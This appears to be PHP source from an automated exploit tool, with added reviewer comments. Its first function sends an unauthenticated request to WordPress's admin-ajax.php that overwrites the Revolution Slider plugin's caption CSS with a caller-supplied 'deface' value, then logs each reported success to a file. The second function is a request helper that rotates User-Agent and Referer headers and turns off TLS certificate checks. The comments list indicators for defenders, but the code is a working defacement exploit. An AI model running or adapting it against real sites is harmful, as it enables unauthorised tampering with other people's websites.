/**
 * Sends one POST to "{target}/wp-admin/admin-ajax.php" carrying the fields
 * action=revslider_ajax_action, client_action=update_captions_css and a
 * caller-supplied "data" value, then reports whether the response contains
 * the text "true".
 *
 * Defender view: the traffic produced here is a POST to admin-ajax.php with
 * that action / client_action pair, and on a reported success the URL with
 * client_action=get_captions_css is logged. These parameter names are the
 * stable indicators to look for in request logs or WAF rules; the User-Agent
 * comes from a helper and should not be relied on as an indicator.
 * No credentials are set on the handle in this function (only a cookie jar
 * file), so the request appears to rely on the AJAX action being reachable
 * without a privileged session. NOTE(review): confirm against the plugin
 * version in use and keep the plugin that registers this action patched.
 *
 * @param array $__ Settings read here: 'target' (base URL), 'proxy' (proxy
 *                  string or null), 'deface' (value sent as "data"), 'line'
 *                  (separator printed after each message).
 * @return void Output is echoed; a reported success is appended to revslider.txt.
 */
function __request($__)
{
    $curlxpl = curl_init();
    curl_setopt($curlxpl, CURLOPT_URL, "{$__['target']}/wp-admin/admin-ajax.php");
    // Route through a proxy only when the caller supplied one.
    !is_null($__['proxy']) ? curl_setopt($curlxpl, CURLOPT_PROXY, $__['proxy']) : NULL;
    // User-Agent is taken from __setUserAgentRandom() (defined elsewhere).
    curl_setopt($curlxpl, CURLOPT_USERAGENT, __setUserAgentRandom());
    curl_setopt($curlxpl, CURLOPT_POST, 1);
    // An array value makes curl send the body as multipart/form-data.
    curl_setopt($curlxpl, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => $__['deface']));
    curl_setopt($curlxpl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curlxpl, CURLOPT_FOLLOWLOCATION, 1);
    // Certificate and host-name verification are both switched off, so the
    // peer's identity is never checked on HTTPS targets.
    curl_setopt($curlxpl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curlxpl, CURLOPT_SSL_VERIFYHOST, 0);
    // Cookies are read from and written to cookie.log in the working directory.
    curl_setopt($curlxpl, CURLOPT_COOKIEFILE, 'cookie.log');
    curl_setopt($curlxpl, CURLOPT_COOKIEJAR, 'cookie.log');
    // The return value of __plus() (helper not visible here) is appended to the body.
    $result = curl_exec($curlxpl) . __plus();
    // NOTE(review): eregi() was removed in PHP 7.0, so this listing only runs on
    // legacy PHP. The check is a case-insensitive match for "true" anywhere in
    // the response, so "Success" below is a heuristic, not proof of a change.
    if (eregi('true', $result)) {
        $h = "{$__['target']}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
        echo "[!] [INFO] Success Exploit!\n";
        echo "[!] [INFO] URL FILE MODIFIED: {$h}\n{$__['line']}\n";
        __plus();
        // Keeps a running list of reported URLs in revslider.txt (append mode).
        file_put_contents("revslider.txt", "{$h}\n\n", FILE_APPEND);
    } else {
        echo "[!] [FAIL] {$__['target']} : nothing changed \n{$__['line']}\n";
    }
    curl_close($curlxpl);
    unset($curlxpl);
}
/**
 * Issues one HTTP request per URL through a curl multi handle and returns the
 * body, curl info, curl error and a one-line header summary.
 *
 * The URL(s) are first passed through __crypt() (defined elsewhere). Request
 * options (extra headers, User-Agent, Referer, timeouts, cookie file) come
 * from $_SESSION['config'] with fallbacks visible below.
 *
 * NOTE(review): the result slots $ret[0..2] are overwritten on every pass of
 * the collection loop, so with several URLs only the last one is returned.
 *
 * @param mixed      $url_      URL or list of URLs; normalised to an array below.
 * @param mixed|null $proxy     Proxy string handed to CURLOPT_PROXY, or NULL for none.
 * @param mixed|null $postDados Field => value array; when given, the request is a POST.
 * @return array|false Keys 'corpo' (response content), 'server' (curl_getinfo()
 *                     array), 'error' (curl_error() string), 'info' (status
 *                     line, Server and X-Powered-By summary); FALSE when no
 *                     content was captured.
 */
function __request_info($url_, $proxy = NULL, $postDados = NULL)
{
    $url_ = __crypt($url_);
    $mh = curl_multi_init();
    $curl_array = array();
    $nodes = is_array($url_) ? $url_ : array($url_);
    foreach ($nodes as $i => $url) {
        $curl_array[$i] = curl_init($url);
        // __plus() is a helper defined elsewhere; its purpose is not visible here.
        __plus();
        // Format the POST body, applying urlencode to each POST value.
        // NOTE(review): $postDados_format is never initialised in this function
        // and is not reset per URL, so it keeps growing across iterations.
        // Field names ($campo) are not encoded, only the values.
        if (not_isnull_empty($postDados) && is_array($postDados)) {
            foreach ($postDados as $campo => $valor) {
                $postDados_format .= "{$campo}=" . urlencode($valor) . '&';
            }
            $postDados_format = rtrim($postDados_format, '&');
            // CURLOPT_POST receives the field count rather than a plain boolean.
            curl_setopt($curl_array[$i], CURLOPT_POST, count($postDados));
            curl_setopt($curl_array[$i], CURLOPT_POSTFIELDS, __crypt($postDados_format));
        }
        // Extra headers come from the session config, split on ','; a fixed
        // "Cookie: disclaimer_accepted=true" header is always appended.
        curl_setopt($curl_array[$i], CURLOPT_HTTPHEADER, array_merge(not_isnull_empty($_SESSION['config']['http-header']) ? explode(',', __crypt($_SESSION['config']['http-header'])) : array(), array("Cookie: disclaimer_accepted=true")));
        // User-Agent and Referer fall back to helper-generated values when not configured.
        curl_setopt($curl_array[$i], CURLOPT_USERAGENT, not_isnull_empty($_SESSION['config']['user-agent']) ? __crypt($_SESSION['config']['user-agent']) : __setUserAgentRandom());
        curl_setopt($curl_array[$i], CURLOPT_REFERER, not_isnull_empty($_SESSION['config']['url-reference']) ? __crypt($_SESSION['config']['url-reference']) : __setURLReferenceRandom());
        !is_null($proxy) ? curl_setopt($curl_array[$i], CURLOPT_PROXY, $proxy) : NULL;
        // Response headers are included in the returned content only when
        // 'verifica_info' is set; otherwise the header patterns further down
        // are matched against the body alone.
        !is_null($_SESSION['config']['verifica_info']) ? curl_setopt($curl_array[$i], CURLOPT_HEADER, 1) : NULL;
        !is_null($_SESSION['config']['verifica_info']) && __validateOptions('3,6', $_SESSION['config']['debug']) ? curl_setopt($curl_array[$i], CURLOPT_VERBOSE, 1) : NULL;
        __plus();
        // Certificate and host-name verification are both disabled, so responses
        // over HTTPS are accepted from any peer without identity checks.
        curl_setopt($curl_array[$i], CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($curl_array[$i], CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($curl_array[$i], CURLOPT_FRESH_CONNECT, 1);
        curl_setopt($curl_array[$i], CURLOPT_RETURNTRANSFER, 1);
        // Connect and total timeouts share one configured value, defaulting to 5 seconds.
        curl_setopt($curl_array[$i], CURLOPT_CONNECTTIMEOUT, not_isnull_empty($_SESSION['config']['time-out']) ? $_SESSION['config']['time-out'] : 5);
        curl_setopt($curl_array[$i], CURLOPT_TIMEOUT, not_isnull_empty($_SESSION['config']['time-out']) ? $_SESSION['config']['time-out'] : 5);
        // Cookie jar defaults to cookie.txt in the working directory.
        curl_setopt($curl_array[$i], CURLOPT_COOKIEFILE, not_isnull_empty($_SESSION['config']['file-cookie']) ? $_SESSION['config']['file-cookie'] : 'cookie.txt');
        curl_setopt($curl_array[$i], CURLOPT_COOKIEJAR, not_isnull_empty($_SESSION['config']['file-cookie']) ? $_SESSION['config']['file-cookie'] : 'cookie.txt');
        curl_multi_add_handle($mh, $curl_array[$i]);
    }
    // Poll the multi handle, sleeping 100 microseconds per pass, until no
    // transfer is still running.
    $running = NULL;
    do {
        usleep(100);
        curl_multi_exec($mh, $running);
    } while ($running > 0);
    $ret = array();
    // Each pass overwrites indexes 0-2, so only the last handle's data is kept.
    foreach ($nodes as $i => $url) {
        $ret[0] = curl_multi_getcontent($curl_array[$i]);
        $ret[1] = curl_getinfo($curl_array[$i]);
        $ret[2] = curl_error($curl_array[$i]);
    }
    // NOTE(review): handles are detached from the multi handle but never
    // passed to curl_close() in this function.
    foreach ($nodes as $i => $url) {
        curl_multi_remove_handle($mh, $curl_array[$i]);
    }
    // Pull the status line, Server and X-Powered-By headers out of the content;
    // the parentheses act as the PCRE delimiters of each pattern.
    $status = NULL;
    preg_match_all('(HTTP.*)', $ret[0], $status['http']);
    preg_match_all('(Server:.*)', $ret[0], $status['server']);
    preg_match_all('(X-Powered-By:.*)', $ret[0], $status['X-Powered-By']);
    __plus();
    // Only the first match of each pattern is used, with CR/LF stripped.
    // NOTE(review): [0][0] is read without checking that a match exists.
    $ret[3] = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]}  {$status['X-Powered-By'][0][0]}"));
    __debug(array('debug' => "[ BODY ]{$ret[0]}", 'function' => '__request_info'), 4);
    __plus();
    __debug(array('debug' => "[ URL ]{$url_}", 'function' => '__request_info'), 2);
    __plus();
    // NOTE(review): unlink() always targets 'cookie.txt', even when a different
    // cookie file was configured above, and its result is discarded by the
    // string concatenation.
    curl_multi_close($mh) . unlink('cookie.txt');
    __plus();
    unset($curl_array);
    // FALSE is returned when no content was captured for the last handle.
    return isset($ret[0]) ? array('corpo' => $ret[0], 'server' => $ret[1], 'error' => $ret[2], 'info' => $ret[3]) : FALSE;
}